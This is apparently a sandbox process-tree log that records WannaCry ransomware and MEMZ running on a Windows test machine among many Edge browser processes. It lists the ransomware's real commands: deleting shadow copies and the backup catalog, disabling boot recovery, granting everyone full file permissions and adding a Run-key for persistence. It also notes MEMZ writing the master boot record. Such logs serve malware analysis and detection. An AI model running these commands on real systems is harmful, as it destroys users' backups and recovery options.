"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
3⤵
PID:4960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5924 /prefetch:8
3⤵
PID:6960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
3⤵
PID:6168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
3⤵
PID:3272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
3⤵
PID:5172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1
3⤵
PID:2396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1704 /prefetch:1
3⤵
PID:7008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
3⤵
PID:2892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
3⤵
PID:5072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6996 /prefetch:1
3⤵
PID:4884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3716 /prefetch:8
3⤵
PID:4568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5636 /prefetch:8
3⤵
PID:6424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6164 /prefetch:8
3⤵
PID:4512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
3⤵
PID:2260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6140 /prefetch:8
3⤵
PID:5804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1
3⤵
PID:5528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
3⤵
PID:6768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6468 /prefetch:8
3⤵
PID:5520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5960 /prefetch:2
3⤵
PID:1548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
3⤵
PID:6552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:1
3⤵
PID:6320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
3⤵
PID:6876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1716 /prefetch:8
3⤵
PID:4948

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
3⤵
- Drops startup file
- Sets desktop wallpaper using registry
PID:4884

C:\Windows\SysWOW64\attrib.exe
attrib +h .
4⤵
- Views/modifies file attributes
PID:2104

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
4⤵
- Modifies file permissions
PID:5912

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
4⤵
PID:1936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 155051720722078.bat
4⤵
PID:5440

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
5⤵
PID:5724

C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
4⤵
- Views/modifies file attributes
PID:5164

C:\Users\Admin\Downloads\@[email protected]
@[email protected] co
4⤵
- Suspicious use of SetWindowsHookEx
PID:7092

C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
5⤵
PID:2104

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
4⤵
PID:4400

C:\Users\Admin\Downloads\@[email protected]
@[email protected] vs
5⤵
- Suspicious use of SetWindowsHookEx
PID:1892

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
6⤵
PID:3744

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
7⤵
PID:532

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
4⤵
PID:5788

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@[email protected]
4⤵
PID:5472

C:\Users\Admin\Downloads\@[email protected]
@[email protected]
4⤵
- Suspicious use of SetWindowsHookEx
PID:916

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tjyfimyzrbju033" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
4⤵
PID:3468

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tjyfimyzrbju033" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
5⤵
- Adds Run key to start application
- Modifies registry key
PID:6028

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
4⤵
PID:6240

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@[email protected]
4⤵
PID:3596

C:\Users\Admin\Downloads\@[email protected]
@[email protected]
4⤵
- Suspicious use of SetWindowsHookEx
PID:4184

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
4⤵
PID:5532

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@[email protected]
4⤵
PID:3076

C:\Users\Admin\Downloads\@[email protected]
@[email protected]
4⤵
- Suspicious use of SetWindowsHookEx
PID:6012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
3⤵
PID:11204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
3⤵
PID:3528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
3⤵
PID:3532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
3⤵
PID:7276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
3⤵
PID:11336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
3⤵
PID:12180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
3⤵
PID:9632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1700 /prefetch:8
3⤵
PID:9548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7032 /prefetch:1
3⤵
PID:9252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
3⤵
PID:8696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7232 /prefetch:1
3⤵
PID:8476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2780 /prefetch:1
3⤵
PID:9416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7704 /prefetch:1
3⤵
PID:2708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7880 /prefetch:8
3⤵
PID:4124

C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe"
3⤵
- Checks computer location settings
PID:7100

C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
4⤵
PID:2140

C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
4⤵
PID:5140

C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
4⤵
PID:8024

C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
4⤵
PID:9500

C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
4⤵
PID:512

C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /main
4⤵
- Checks computer location settings
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:2552

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" \note.txt
5⤵
PID:10288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+2+buy+weed
5⤵
PID:11456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:11500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=bonzi+buddy+download+free
5⤵
PID:2152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:3400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=mcafee+vs+norton
5⤵
PID:9560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:8292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=montage+parody+making+program+2016
5⤵
PID:9304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:9396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+code+a+virus+in+visual+basic
5⤵
PID:6508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:4880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=mcafee+vs+norton
5⤵
PID:7340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:7336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+send+a+virus+to+my+friend
5⤵
PID:6828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:8064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=facebook+hacking+tool+free+download+no+virus+working+2016
5⤵
PID:9404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=vinesauce+meme+collection
5⤵
PID:4448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
